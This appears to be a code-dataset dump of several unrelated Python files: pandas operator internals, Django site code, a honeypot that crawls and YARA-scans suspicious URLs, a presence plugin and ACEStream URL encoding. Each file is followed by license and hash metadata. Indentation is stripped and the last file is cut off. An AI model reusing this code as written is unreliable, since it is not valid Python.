raise ValueError("Can only compare identically-labeled " "Series objects")
elif is_categorical_dtype(self):
# Dispatch to Categorical implementation; pd.CategoricalIndex
# behavior is non-canonical GH#19513
res_values = dispatch_to_index_op(op, self, other, pd.Categorical)
return self._constructor(res_values, index=self.index, name=res_name)
elif is_datetime64_dtype(self) or is_datetime64tz_dtype(self):
# Dispatch to DatetimeIndex to ensure identical
# Series/Index behavior
if isinstance(other, datetime.date) and not isinstance(
other, datetime.datetime
):
# https://github.com/pandas-dev/pandas/issues/21152
# Compatibility for difference between Series comparison w/
# datetime and date
msg = (
"Comparing Series of datetimes with 'datetime.date'. "
"Currently, the 'datetime.date' is coerced to a "
"datetime. In the future pandas will not coerce, "
"and {future}. "
"To retain the current behavior, "
"convert the 'datetime.date' to a datetime with "
"'pd.Timestamp'."
)
if op in {operator.lt, operator.le, operator.gt, operator.ge}:
future = "a TypeError will be raised"
else:
future = (
"'the values will not compare equal to the " "'datetime.date'"
)
msg = "\n".join(textwrap.wrap(msg.format(future=future)))
warnings.warn(msg, FutureWarning, stacklevel=2)
other = Timestamp(other)
res_values = dispatch_to_index_op(op, self, other, pd.DatetimeIndex)
return self._constructor(res_values, index=self.index, name=res_name)
elif is_timedelta64_dtype(self):
res_values = dispatch_to_index_op(op, self, other, pd.TimedeltaIndex)
return self._constructor(res_values, index=self.index, name=res_name)
elif is_extension_array_dtype(self) or (
is_extension_array_dtype(other) and not is_scalar(other)
):
# Note: the `not is_scalar(other)` condition rules out
# e.g. other == "category"
return dispatch_to_extension_op(op, self, other)
elif isinstance(other, ABCSeries):
# By this point we have checked that self._indexed_same(other)
res_values = na_op(self.values, other.values)
# rename is needed in case res_name is None and res_values.name
# is not.
return self._constructor(
res_values, index=self.index, name=res_name
).rename(res_name)
elif isinstance(other, (np.ndarray, ABCIndexClass)):
# do not check length of zerodim array
# as it will broadcast
if other.ndim != 0 and len(self) != len(other):
raise ValueError("Lengths must match to compare")
res_values = na_op(self.values, np.asarray(other))
result = self._constructor(res_values, index=self.index)
# rename is needed in case res_name is None and self.name
# is not.
return result.__finalize__(self).rename(res_name)
elif is_scalar(other) and isna(other):
# numpy does not like comparisons vs None
if op is operator.ne:
res_values = np.ones(len(self), dtype=bool)
else:
res_values = np.zeros(len(self), dtype=bool)
return self._constructor(
res_values, index=self.index, name=res_name, dtype="bool"
)
else:
values = self.to_numpy()
with np.errstate(all="ignore"):
res = na_op(values, other)
if is_scalar(res):
raise TypeError(
"Could not compare {typ} type with Series".format(typ=type(other))
)
# always return a full value series here
res_values = com.values_from_object(res)
return self._constructor(
res_values, index=self.index, name=res_name, dtype="bool"
)
wrapper.__name__ = op_name
return wrapper
def _bool_method_SERIES(cls, op, special):
"""
Wrapper function for Series arithmetic operations, to avoid
code duplication.
"""
op_name = _get_op_name(op, special)
def na_op(x, y):
try:
result = op(x, y)
except TypeError:
assert not isinstance(y, (list, ABCSeries, ABCIndexClass))
if isinstance(y, np.ndarray):
# bool-bool dtype operations should be OK, should not get here
assert not (is_bool_dtype(x) and is_bool_dtype(y))
x = ensure_object(x)
y = ensure_object(y)
result = libops.vec_binop(x, y, op)
else:
# let null fall thru
assert lib.is_scalar(y)
if not isna(y):
y = bool(y)
try:
result = libops.scalar_binop(x, y, op)
except (
TypeError,
ValueError,
AttributeError,
OverflowError,
NotImplementedError,
):
raise TypeError(
"cannot compare a dtyped [{dtype}] array "
"with a scalar of type [{typ}]".format(
dtype=x.dtype, typ=type(y).__name__
)
)
return result
fill_int = lambda x: x.fillna(0)
fill_bool = lambda x: x.fillna(False).astype(bool)
def wrapper(self, other):
is_self_int_dtype = is_integer_dtype(self.dtype)
self, other = _align_method_SERIES(self, other, align_asobject=True)
res_name = get_op_result_name(self, other)
if isinstance(other, ABCDataFrame):
# Defer to DataFrame implementation; fail early
return NotImplemented
elif isinstance(other, (ABCSeries, ABCIndexClass)):
is_other_int_dtype = is_integer_dtype(other.dtype)
other = fill_int(other) if is_other_int_dtype else fill_bool(other)
ovalues = other.values
finalizer = lambda x: x
else:
# scalars, list, tuple, np.array
is_other_int_dtype = is_integer_dtype(np.asarray(other))
if is_list_like(other) and not isinstance(other, np.ndarray):
# TODO: Can we do this before the is_integer_dtype check?
# could the is_integer_dtype check be checking the wrong
# thing? e.g. other = [[0, 1], [2, 3], [4, 5]]?
other = construct_1d_object_array_from_listlike(other)
ovalues = other
finalizer = lambda x: x.__finalize__(self)
# For int vs int `^`, `|`, `&` are bitwise operators and return
# integer dtypes. Otherwise these are boolean ops
filler = fill_int if is_self_int_dtype and is_other_int_dtype else fill_bool
res_values = na_op(self.values, ovalues)
unfilled = self._constructor(res_values, index=self.index, name=res_name)
filled = filler(unfilled)
return finalizer(filled)
wrapper.__name__ = op_name
return wrapper
def _flex_method_SERIES(cls, op, special):
name = _get_op_name(op, special)
doc = _make_flex_doc(name, "series")
@Appender(doc)
def flex_wrapper(self, other, level=None, fill_value=None, axis=0):
# validate axis
if axis is not None:
self._get_axis_number(axis)
if isinstance(other, ABCSeries):
return self._binop(other, op, level=level, fill_value=fill_value)
elif isinstance(other, (np.ndarray, list, tuple)):
if len(other) != len(self):
raise ValueError("Lengths must be equal")
other = self._constructor(other, self.index)
return self._binop(other, op, level=level, fill_value=fill_value)
else:
if fill_value is not None:
self = self.fillna(fill_value)
return self._constructor(op(self, other), self.index).__finalize__(self)
flex_wrapper.__name__ = name
return flex_wrapper
# -----------------------------------------------------------------------------
# DataFrame
def _combine_series_frame(self, other, func, fill_value=None, axis=None, level=None):
"""
Apply binary operator `func` to self, other using alignment and fill
conventions determined by the fill_value, axis, and level kwargs.
Parameters
----------
self : DataFrame
other : Series
func : binary operator
fill_value : object, default None
axis : {0, 1, 'columns', 'index', None}, default None
level : int or None, default None
Returns
-------
result : DataFrame
"""
if fill_value is not None:
raise NotImplementedError(
"fill_value {fill} not supported.".format(fill=fill_value)
)
if axis is not None:
axis = self._get_axis_number(axis)
if axis == 0:
return self._combine_match_index(other, func, level=level)
else:
return self._combine_match_columns(other, func, level=level)
else:
if not len(other):
return self * np.nan
if not len(self):
# Ambiguous case, use _series so works with DataFrame
return self._constructor(
data=self._series, index=self.index, columns=self.columns
)
# default axis is columns
return self._combine_match_columns(other, func, level=level)
def _align_method_FRAME(left, right, axis):
""" convert rhs to meet lhs dims if input is list, tuple or np.ndarray """
def to_series(right):
msg = (
"Unable to coerce to Series, length must be {req_len}: " "given {given_len}"
)
if axis is not None and left._get_axis_name(axis) == "index":
if len(left.index) != len(right):
raise ValueError(
msg.format(req_len=len(left.index), given_len=len(right))
)
right = left._constructor_sliced(right, index=left.index)
else:
if len(left.columns) != len(right):
raise ValueError(
msg.format(req_len=len(left.columns), given_len=len(right))
)
right = left._constructor_sliced(right, index=left.columns)
return right
if isinstance(right, np.ndarray):
if right.ndim == 1:
right = to_series(right)
elif right.ndim == 2:
if right.shape == left.shape:
right = left._constructor(right, index=left.index, columns=left.columns)
elif right.shape[0] == left.shape[0] and right.shape[1] == 1:
# Broadcast across columns
right = np.broadcast_to(right, left.shape)
right = left._constructor(right, index=left.index, columns=left.columns)
elif right.shape[1] == left.shape[1] and right.shape[0] == 1:
# Broadcast along rows
right = to_series(right[0, :])
else:
raise ValueError(
"Unable to coerce to DataFrame, shape "
"must be {req_shape}: given {given_shape}".format(
req_shape=left.shape, given_shape=right.shape
)
)
elif right.ndim > 2:
raise ValueError(
"Unable to coerce to Series/DataFrame, dim "
"must be <= 2: {dim}".format(dim=right.shape)
)
elif is_list_like(right) and not isinstance(right, (ABCSeries, ABCDataFrame)):
# GH17901
right = to_series(right)
return right
def _arith_method_FRAME(cls, op, special):
str_rep = _get_opstr(op, cls)
op_name = _get_op_name(op, special)
eval_kwargs = _gen_eval_kwargs(op_name)
default_axis = _get_frame_op_default_axis(op_name)
def na_op(x, y):
import pandas.core.computation.expressions as expressions
try:
result = expressions.evaluate(op, str_rep, x, y, **eval_kwargs)
except TypeError:
result = masked_arith_op(x, y, op)
return missing.dispatch_fill_zeros(op, x, y, result)
if op_name in _op_descriptions:
# i.e. include "add" but not "__add__"
doc = _make_flex_doc(op_name, "dataframe")
else:
doc = _arith_doc_FRAME % op_name
@Appender(doc)
def f(self, other, axis=default_axis, level=None, fill_value=None):
other = _align_method_FRAME(self, other, axis)
if isinstance(other, ABCDataFrame):
# Another DataFrame
pass_op = op if should_series_dispatch(self, other, op) else na_op
return self._combine_frame(other, pass_op, fill_value, level)
elif isinstance(other, ABCSeries):
# For these values of `axis`, we end up dispatching to Series op,
# so do not want the masked op.
pass_op = op if axis in [0, "columns", None] else na_op
return _combine_series_frame(
self, other, pass_op, fill_value=fill_value, axis=axis, level=level
)
else:
if fill_value is not None:
self = self.fillna(fill_value)
assert np.ndim(other) == 0
return self._combine_const(other, op)
f.__name__ = op_name
return f
def _flex_comp_method_FRAME(cls, op, special):
str_rep = _get_opstr(op, cls)
op_name = _get_op_name(op, special)
default_axis = _get_frame_op_default_axis(op_name)
def na_op(x, y):
try:
with np.errstate(invalid="ignore"):
result = op(x, y)
except TypeError:
result = mask_cmp_op(x, y, op)
return result
doc = _flex_comp_doc_FRAME.format(
op_name=op_name, desc=_op_descriptions[op_name]["desc"]
)
@Appender(doc)
def f(self, other, axis=default_axis, level=None):
other = _align_method_FRAME(self, other, axis)
if isinstance(other, ABCDataFrame):
# Another DataFrame
if not self._indexed_same(other):
self, other = self.align(other, "outer", level=level, copy=False)
return dispatch_to_series(self, other, na_op, str_rep)
elif isinstance(other, ABCSeries):
return _combine_series_frame(
self, other, na_op, fill_value=None, axis=axis, level=level
)
else:
assert np.ndim(other) == 0, other
return self._combine_const(other, na_op)
f.__name__ = op_name
return f
def _comp_method_FRAME(cls, func, special):
str_rep = _get_opstr(func, cls)
op_name = _get_op_name(func, special)
@Appender("Wrapper for comparison method {name}".format(name=op_name))
def f(self, other):
other = _align_method_FRAME(self, other, axis=None)
if isinstance(other, ABCDataFrame):
# Another DataFrame
if not self._indexed_same(other):
raise ValueError(
"Can only compare identically-labeled " "DataFrame objects"
)
return dispatch_to_series(self, other, func, str_rep)
elif isinstance(other, ABCSeries):
return _combine_series_frame(
self, other, func, fill_value=None, axis=None, level=None
)
else:
# straight boolean comparisons we want to allow all columns
# (regardless of dtype to pass thru) See #4537 for discussion.
res = self._combine_const(other, func)
return res.fillna(True).astype(bool)
f.__name__ = op_name
return f
# -----------------------------------------------------------------------------
# Sparse
def _cast_sparse_series_op(left, right, opname):
"""
For SparseSeries operation, coerce to float64 if the result is expected
to have NaN or inf values
Parameters
----------
left : SparseArray
right : SparseArray
opname : str
Returns
-------
left : SparseArray
right : SparseArray
"""
from pandas.core.sparse.api import SparseDtype
opname = opname.strip("_")
# TODO: This should be moved to the array?
if is_integer_dtype(left) and is_integer_dtype(right):
# series coerces to float64 if result should have NaN/inf
if opname in ("floordiv", "mod") and (right.to_dense() == 0).any():
left = left.astype(SparseDtype(np.float64, left.fill_value))
right = right.astype(SparseDtype(np.float64, right.fill_value))
elif opname in ("rfloordiv", "rmod") and (left.to_dense() == 0).any():
left = left.astype(SparseDtype(np.float64, left.fill_value))
right = right.astype(SparseDtype(np.float64, right.fill_value))
return left, right
def _arith_method_SPARSE_SERIES(cls, op, special):
"""
Wrapper function for Series arithmetic operations, to avoid
code duplication.
"""
op_name = _get_op_name(op, special)
def wrapper(self, other):
if isinstance(other, ABCDataFrame):
return NotImplemented
elif isinstance(other, ABCSeries):
if not isinstance(other, ABCSparseSeries):
other = other.to_sparse(fill_value=self.fill_value)
return _sparse_series_op(self, other, op, op_name)
elif is_scalar(other):
with np.errstate(all="ignore"):
new_values = op(self.values, other)
return self._constructor(new_values, index=self.index, name=self.name)
else: # pragma: no cover
raise TypeError(
"operation with {other} not supported".format(other=type(other))
)
wrapper.__name__ = op_name
return wrapper
def _sparse_series_op(left, right, op, name):
left, right = left.align(right, join="outer", copy=False)
new_index = left.index
new_name = get_op_result_name(left, right)
from pandas.core.arrays.sparse import _sparse_array_op
lvalues, rvalues = _cast_sparse_series_op(left.values, right.values, name)
result = _sparse_array_op(lvalues, rvalues, op, name)
return left._constructor(result, index=new_index, name=new_name)
def maybe_dispatch_ufunc_to_dunder_op(
self: ArrayLike, ufunc: Callable, method: str, *inputs: ArrayLike, **kwargs: Any
):
"""
Dispatch a ufunc to the equivalent dunder method.
Parameters
----------
self : ArrayLike
The array whose dunder method we dispatch to
ufunc : Callable
A NumPy ufunc
method : {'reduce', 'accumulate', 'reduceat', 'outer', 'at', '__call__'}
inputs : ArrayLike
The input arrays.
kwargs : Any
The additional keyword arguments, e.g. ``out``.
Returns
-------
result : Any
The result of applying the ufunc
"""
# special has the ufuncs we dispatch to the dunder op on
special = {
"add",
"sub",
"mul",
"pow",
"mod",
"floordiv",
"truediv",
"divmod",
"eq",
"ne",
"lt",
"gt",
"le",
"ge",
"remainder",
"matmul",
}
aliases = {
"subtract": "sub",
"multiply": "mul",
"floor_divide": "floordiv",
"true_divide": "truediv",
"power": "pow",
"remainder": "mod",
"divide": "div",
"equal": "eq",
"not_equal": "ne",
"less": "lt",
"less_equal": "le",
"greater": "gt",
"greater_equal": "ge",
}
# For op(., Array) -> Array.__r{op}__
flipped = {
"lt": "__gt__",
"le": "__ge__",
"gt": "__lt__",
"ge": "__le__",
"eq": "__eq__",
"ne": "__ne__",
}
op_name = ufunc.__name__
op_name = aliases.get(op_name, op_name)
def not_implemented(*args, **kwargs):
return NotImplemented
if method == "__call__" and op_name in special and kwargs.get("out") is None:
if isinstance(inputs[0], type(self)):
name = "__{}__".format(op_name)
return getattr(self, name, not_implemented)(inputs[1])
else:
name = flipped.get(op_name, "__r{}__".format(op_name))
return getattr(self, name, not_implemented)(inputs[0])
else:
return NotImplemented
|
apache-2.0
| 6,046,639,829,361,250,000
| 30.796562
| 88
| 0.572749
| false
| 3.972578
| false
| false
| false
|
debalance/hp
|
hp/core/constants.py
|
1
|
1561
|
# -*- coding: utf-8 -*-
#
# This file is part of the jabber.at homepage (https://github.com/jabber-at/hp).
#
# This project is free software: you can redistribute it and/or modify it under the terms of the
# GNU General Public License as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This project is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with django-xmpp-account.
# If not, see <http://www.gnu.org/licenses/>.
from django.utils.translation import ugettext_lazy as _
REGISTRATION_WEBSITE = 0
REGISTRATION_INBAND = 1
REGISTRATION_MANUAL = 2
REGISTRATION_UNKNOWN = 9
REGISTRATION_CHOICES = (
(REGISTRATION_WEBSITE, _('Via Website')),
(REGISTRATION_INBAND, _('In-Band Registration')),
(REGISTRATION_MANUAL, _('Manually')),
(REGISTRATION_UNKNOWN, _('Unknown')),
)
TARGET_URL = 0
TARGET_NAMED_URL = 1
TARGET_MODEL = 2
TARGET_CHOICES = {
TARGET_URL: _('URL'),
TARGET_NAMED_URL: _('URL Name'),
TARGET_MODEL: _('Model'),
}
# Logged user activities
ACTIVITY_REGISTER = 0
ACTIVITY_RESET_PASSWORD = 1
ACTIVITY_SET_PASSWORD = 2
ACTIVITY_SET_EMAIL = 3
ACTIVITY_FAILED_LOGIN = 4
ACTIVITY_CONTACT = 5 # used for ratelimiting
ACTIVITY_RESEND_CONFIRMATION = 6 # When the user wants to resend the confirmation
|
gpl-3.0
| -4,503,386,072,711,604,000
| 32.934783
| 99
| 0.728379
| false
| 3.572082
| false
| false
| false
|
Masood-M/yalih
|
honeypot.py
|
1
|
6809
|
#! /usr/bin/env python
import time
import threading
import os, sys, Queue
from time import gmtime, strftime
from itertools import groupby
from operator import itemgetter
import os.path
import imapfile
import logging
import honeypotconfig
import scan
import bing
import executemechanize
import malwebsites
import normalize
import updateantivirus
import yaradetection
import unquote
import argparse
import extraction
try:
import signal
from signal import SIGPIPE, SIG_IGN
signal.signal(signal.SIGPIPE, signal.SIG_IGN)
except ImportError:
pass
queue=Queue.Queue()
logger = logging.getLogger()
def worker():
urldict = queue.get()
#this is for the normal visitor output (no error)
logger.info(str(urldict["counter"]) + ",\t" + urldict["url"]+",\t"+ "Visiting")
executemechanize.executemechanize(urldict)
queue.task_done()
def threadmaker():
while True:
threadstomake = honeypotconfig.threadnum - threading.active_count()
for i in range(threadstomake):
thread = threading.Thread(target=worker)
thread.setDaemon(True)
thread.start()
time.sleep(5)
def readurl():
url = sys.argv[2]
return url
def main():
#Create the threads
thread = threading.Thread(target=threadmaker)
thread.setDaemon(True)
thread.start()
script_path = os.path.dirname(os.path.abspath( __file__ ))
parser = argparse.ArgumentParser(description="Examples:\n/honeypot.py --url www.yahoo.com\nhoneypot.py --file <file path>\n./honeypot.py --blacklist\n./honeypot.py --email\n./honeypot.py --update\n./honeypot.py --search <warez>\n./honeypot.py --local <file/directory path>", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("--email", help="Retrieves your Spam emails from your mail server and crawls the extracted URLS. Enter your email credentials in honeypotconfig.py file!", action="store_true")
parser.add_argument("--update", help="Updates the anti-virus signatures", action="store_true")
parser.add_argument("--blacklist", help="Downloads list of suspicious malicious websites from three databases and retrieves/scans them accordingly", action="store_true")
parser.add_argument("--file", nargs=1, help="Provide an input file", action="store")
parser.add_argument("--url", nargs=1, help="Provide a url", action="store")
parser.add_argument("--search", nargs=1, help="searches Bing search engine for a keyword (1 single keyword at the moment) and returns 100 results starting from the 20th result.", action="store")
parser.add_argument("--local", nargs=1, help="scans a local file or directory for malicious signatures.", action="store")
parser.add_argument("--debug", help="Include http header", action="store_true")
parser.add_argument("--crawler", help="Crawl the sites and save any executables found", action="store_true")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
path = script_path+"/tmp"
print path
#create the tmp folder
if not os.path.isdir(path):
os.makedirs("tmp")
#Crawler
if args.crawler:
executemechanize.crawler = True
#Logging
"""Initialize logger."""
command = "mkdir -p debug/" #create a temporary folder in your working space folder
os.system(command)
sys.stdin=open("debug/" + time.asctime(time.localtime(time.time())) +".log", "a")
logger = logging.getLogger()
sh = logging.StreamHandler()
sh.setFormatter(SpecialFormatter())
sh2 = logging.StreamHandler(sys.stdin)
sh2.setFormatter(SpecialFormatter())
logger.addHandler(sh)
logger.addHandler(sh2)
logger.setLevel(logging.INFO)
if args.debug:
logger.setLevel(logging.DEBUG)
executemechanize.set_logging_level(logging.DEBUG)
#Update antivirus signatures
if args.update:
updateantivirus.updateantivirus()
#Blacklist Databases
if args.blacklist:
try:
if not os.path.exists("list"):
os.mkdir("list")
except OSError as e:
logger.error(e)
malwebsites.domaindownload()
malwebsites.duplicateremover()
urls = open("list/malwebsites.txt", "r")
counter = 0
for line in urls:
dict={}
counter += 1
dict["url"] = line.strip()
dict["counter"] = counter
queue.put(dict)
queue.join()
scan.scanning(path)
yaradetection.listandscan(path)
unquote.unquoteDirectory(path)
#Email
if args.email:
imapfile.imap()
extraction.extracturl()#extracts urls from emails.txt file
extraction.duplicateremover() #removes the duplicate urls from crawler.txt files (which now contain extracted urls from emails.txt)
os.remove("emails.txt")
urls = open('crawler.txt', "r")
counter = 0
for line in urls:
dict={}
counter += 1
dict["url"] = line.rstrip()
dict["counter"] = counter
queue.put(dict)
queue.join()
scan.scanning(path)
yaradetection.listandscan(path)
unquote.unquoteDirectory(path)
#File
if args.file:
mylist = list()
mylist2 = list()
counter =0
fopen3 = open(sys.argv[2],"r")
for line in fopen3:
dict={}
line = line.strip()
counter += 1
if not (line.startswith("http://")) and not (line.startswith("https://")):
line = "http://"+line
dict["url"] = line
dict["counter"] = counter
queue.put(dict)
queue.join()
fopen3.close()
scan.scanning(path)
yaradetection.listandscan(path)
unquote.unquoteDirectory(path)
#URL
if args.url:
url = readurl()
url = normalize.normalizeurl(url)
dict={}
counter = 1
if not (url.startswith("http://")) and not (url.startswith("https://")):
url = "http://"+url
dict["url"] = url
dict["counter"] = counter
queue.put(dict)
queue.join()
# executemechanize.executemechanize(url)
scan.scanning(path)
yaradetection.listandscan(path)
unquote.unquoteDirectory(path)
#Search
if args.search:
keyword = sys.argv[2]
bing.searchBing(keyword)
mylist = list()
fopen = open("list/searchresult.txt","r")
for line in fopen:
line = line.strip()
if not line:
continue
mylist.append(line)
fopen.close()
counter = 0
for line in mylist:
dict={}
counter += 1
dict["url"] = line
dict["counter"] = counter
queue.put(dict)
queue.join()
scan.scanning(path)
yaradetection.listandscan(path)
unquote.unquoteDirectory(path)
#Local Scan
if args.local:
path = sys.argv[2]
scan.scanning(path)
yaradetection.listandscan(path)
unquote.unquoteDirectory(path)
class SpecialFormatter(logging.Formatter):
FORMATS = {logging.INFO : "%(name)s,\t%(levelname)s,\t%(message)s", 'DEFAULT' : "%(name)s,\t%(levelname)s,\t%(message)s"}
def formatTime(self, record, datefmt=None):
self._datefmt = time.strftime("%Y-%m-%d %H:%M:%S")
return logging.Formatter.formatTime(self, record, self._datefmt)
def format(self, record):
self._fmt = self.FORMATS.get(record.levelno, self.FORMATS['DEFAULT'])
return logging.Formatter.format(self, record)
if __name__ == "__main__":
main()
|
apache-2.0
| 7,934,120,239,446,023,000
| 25.597656
| 322
| 0.708474
| false
| 3.095
| false
| false
| false
|
proximate/proximate
|
userpresence.py
|
1
|
1863
|
#
# Proximate - Peer-to-peer social networking
#
# Copyright (c) 2008-2011 Nokia Corporation
#
# All rights reserved.
#
# This software is licensed under The Clear BSD license.
# See the LICENSE file for more details.
#
from plugins import Plugin, get_plugin_by_type
from proximateprotocol import PLUGIN_TYPE_COMMUNITY, PLUGIN_TYPE_NOTIFICATION, PLUGIN_TYPE_USER_PRESENCE
from userpresence_gui import User_Presence_GUI
community = None
notify = None
class Pattern:
def __init__(self, dict):
self.dict = dict
def match(self, user):
for (key, value) in self.dict.iteritems():
if user.get(key).find(value) < 0:
return False
return True
def __str__(self):
return str(self.dict)
class User_Presence_Plugin(Plugin):
def __init__(self):
global community, notify
self.register_plugin(PLUGIN_TYPE_USER_PRESENCE)
community = get_plugin_by_type(PLUGIN_TYPE_COMMUNITY)
notify = get_plugin_by_type(PLUGIN_TYPE_NOTIFICATION)
self.patterns = []
def user_appears(self, user):
nick = user.get('nick')
for p in self.patterns:
if p.match(user):
notify.notify_with_response('User %s appeared' % nick, self.response_handler, None)
def user_changes(self, user, what=None):
for p in self.patterns:
if p.match(user):
notify.notify_with_response('User %s appeared' % nick, self.response_handler, None)
def response_handler(self, response, msg, ctx):
return False
def add_pattern(self, pdict):
p = Pattern(pdict)
self.patterns.append(p)
def delete_pattern(self, pattern):
self.patterns.remove(p)
def get_patterns(self):
return self.patterns
def init(options):
if options.presence:
User_Presence_Plugin()
|
bsd-3-clause
| 5,973,490,620,666,871,000
| 27.227273
| 104
| 0.640902
| false
| 3.631579
| false
| false
| false
|
desarrollosimagos/svidb
|
administrativo/actores/bancoaudio.py
|
1
|
5678
|
# -*- coding: utf8
from gestion.models import *
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext, loader
from actores.models import *
from areas.models import *
from especies.models import *
from plantillas.models import *
from menu.models import *
from perfil.models import PerfilPublico,ModulosPublicos,PerfilModulos
from django.db.models import Q
from forms import *
from inicio.models import Tipocolaboracion
from mapas.models import Colaboradorespersonas,contriBiblioteca,contriAudio,contriAvistamiento
def index(request):
_username = request.user.username
id_usuario = User.objects.get(username=_username)
id_persona = get_object_or_404(PerfilPublico, user=id_usuario.id)
persona = get_object_or_404(Directorios, pk=id_persona.persona.id)
return render_to_response('actores/bancoaudio/index.html', {'persona':persona})
def lista(request):
_username = request.user.username
id_usuario = User.objects.get(username=_username)
id_persona = get_object_or_404(PerfilPublico, user=id_usuario.id)
persona = get_object_or_404(Directorios, pk=id_persona.persona.id)
try:
biblioteca = Bancoaudiovisuals.objects.filter(directorio=persona).order_by('fecha')
except Bancoaudiovisuals.DoesNotExist:
biblioteca = None
return render_to_response('actores/bancoaudio/tus_aportes.html', {'persona':persona,'biblioteca':biblioteca})
#@csrf_protect
def agregar(request):
_username = request.user.username
id_usuario = User.objects.get(username=_username)
id_persona = get_object_or_404(PerfilPublico, user=id_usuario.id)
persona = get_object_or_404(Directorios, pk=id_persona.persona.id)
#si se recibe el metodo post
if request.method == 'POST':
#formulario enviado
banco_form = AgregarBancoaudiovisualsPublic(request.POST, request.FILES)
#validar formulario
if banco_form.is_valid():
banco = banco_form.save()
today = datetime.now()
dateFormat = today.strftime("%Y-%m-%d")
tipocolaboracion = Tipocolaboracion.objects.get(id=15)
titulo = u'Colaboracion en Banco Audiovisual: %s' %(banco.id)
contribucion = Colaboradorespersonas(fecha=dateFormat,tipoColaboracion=tipocolaboracion,titulo=titulo,userupdate=id_usuario,persona=persona,estatu=3)
contribucion.save()
aporte = contriAudio(contribucion=contribucion,audio=banco)
aporte.save()
mensaje=True
return render_to_response('actores/bancoaudio/index.html',{'msm':mensaje,'persona':persona,'id_usuario':id_usuario})
else:
biblioteca_form = AgregarBancoaudiovisualsPublic(request.POST)
mensaje=True
return render_to_response('actores/bancoaudio/nuevo.html',{'form':banco_form,'msm':mensaje,'persona':persona,'usuario':id_usuario}, context_instance=RequestContext(request))
else:
#formulario incial
mensaje=False
banco_form = AgregarBancoaudiovisualsPublic()
return render_to_response('actores/bancoaudio/nuevo.html',{'form':banco_form,'persona':persona,'usuario':id_usuario}, context_instance=RequestContext(request))
def galeria(request,elemento,id):
if elemento == 'actor':
try:
datos = Actores.objects.get(id=id)
except Actores.DoesNotExist:
datos = None
if elemento == 'areas':
try:
datos = Areas.objects.get(id=id)
except Areas.DoesNotExist:
datos = None
if elemento == 'taxon':
try:
datos = DetalleTaxon.objects.get(id=id)
except DetalleTaxon.DoesNotExist:
datos = None
return render_to_response('actores/bancoaudio/galeria.html', {'elemento':datos})
def PaginadorGaleria(request,elemento,id,pagina):
if elemento == 'actor':
try:
datos = Actores.objects.get(id=id)
except Actores.DoesNotExist:
datos = None
if elemento == 'areas':
try:
datos = Areas.objects.get(id=id)
except Areas.DoesNotExist:
datos = None
if elemento == 'taxon':
try:
datos = DetalleTaxon.objects.get(id=id)
except DetalleTaxon.DoesNotExist:
datos = None
image_list = datos.bancoaudio.all()
paginator = Paginator(image_list, 4)
page = pagina
try:
mesn = paginator.page(page)
except PageNotAnInteger:
mesn = paginator.page(1)
return render_to_response('actores/bancoaudio/paginadorGaleria.html', {'elemento':elemento,'mesn':mesn,'id':id})
def PaginadorGaleria2(request,pagina,id):
try:
dat = Bancoaudiovisuals.objects.get(pk=id)
except Bancoaudiovisuals.DoesNotExist:
dat = None
try:
datos = Bancoaudiovisuals.objects.filter()
except Bancoaudiovisuals.DoesNotExist:
datos = None
# image_list = datos.all()
paginator = Paginator(datos, 10)
page = pagina
try:
mesn = paginator.page(page)
except PageNotAnInteger:
mesn = paginator.page(1)
return render_to_response('actores/bancoaudio/paginadorGaleria2.html', {'mesn':mesn,'dat':dat})
def bancoVer(request,id):
try:
datos = Bancoaudiovisuals.objects.get(pk=id)
except Bancoaudiovisuals.DoesNotExist:
datos = None
return render_to_response('actores/bancoaudio/bancover.html', {'datos':datos})
|
gpl-3.0
| 5,877,501,885,763,019,000
| 36.364865
| 188
| 0.664142
| false
| 3.216997
| false
| false
| false
|
aplicatii-romanesti/allinclusive-kodi-pi
|
.kodi/userdata/addon_data/plugin.video.p2p-streams/acestream/ace/ACEStream/Core/APIImplementation/makeurl.py
|
1
|
8330
|
#Embedded file name: ACEStream\Core\APIImplementation\makeurl.pyo
import sys
import urlparse
import urllib
import math
#if sys.platform != 'win32':
# import curses.ascii
from types import IntType, LongType
from struct import pack, unpack
from base64 import b64encode, b64decode
from M2Crypto import Rand
from traceback import print_exc, print_stack
from ACEStream.Core.simpledefs import *
from ACEStream.Core.Utilities.TSCrypto import sha
DEBUG = False
def metainfo2p2purl(metainfo):
info = metainfo['info']
bitrate = None
if 'azureus_properties' in metainfo:
azprops = metainfo['azureus_properties']
if 'Content' in azprops:
content = metainfo['azureus_properties']['Content']
if 'Speed Bps' in content:
bitrate = content['Speed Bps']
if 'encoding' not in metainfo:
encoding = 'utf-8'
else:
encoding = metainfo['encoding']
urldict = {}
urldict['s'] = p2purl_encode_piecelength(info['piece length'])
urldict['n'] = p2purl_encode_name2url(info['name'], encoding)
if info.has_key('length'):
urldict['l'] = p2purl_encode_nnumber(info['length'])
else:
raise ValueError('Multi-file torrents currently not supported')
if info.has_key('root hash'):
urldict['r'] = b64urlencode(info['root hash'])
elif info.has_key('live'):
urldict['k'] = b64urlencode(info['live']['pubkey'])
urldict['a'] = info['live']['authmethod']
else:
raise ValueError('url-compat and Merkle torrent must be on to create URL')
if bitrate is not None:
urldict['b'] = p2purl_encode_nnumber(bitrate)
query = ''
for k in ['n',
'r',
'k',
'l',
's',
'a',
'b']:
if k in urldict:
if query != '':
query += '&'
v = urldict[k]
if k == 'n':
s = v
else:
s = k + '=' + v
query += s
sidx = metainfo['announce'].find(':')
hierpart = metainfo['announce'][sidx + 1:]
url = P2PURL_SCHEME + ':' + hierpart + '?' + query
return url
def p2purl2metainfo(url):
if DEBUG:
print >> sys.stderr, 'p2purl2metainfo: URL', url
colidx = url.find(':')
scheme = url[0:colidx]
qidx = url.find('?')
if qidx == -1:
authority = None
path = None
query = url[colidx + 1:]
fragment = None
else:
authoritypath = url[colidx + 3:qidx]
pidx = authoritypath.find('/')
authority = authoritypath[0:pidx]
path = authoritypath[pidx:]
fidx = url.find('#')
if fidx == -1:
query = url[qidx + 1:]
fragment = None
else:
query = url[qidx + 1:fidx]
fragment = url[fidx:]
csbidx = authority.find(']')
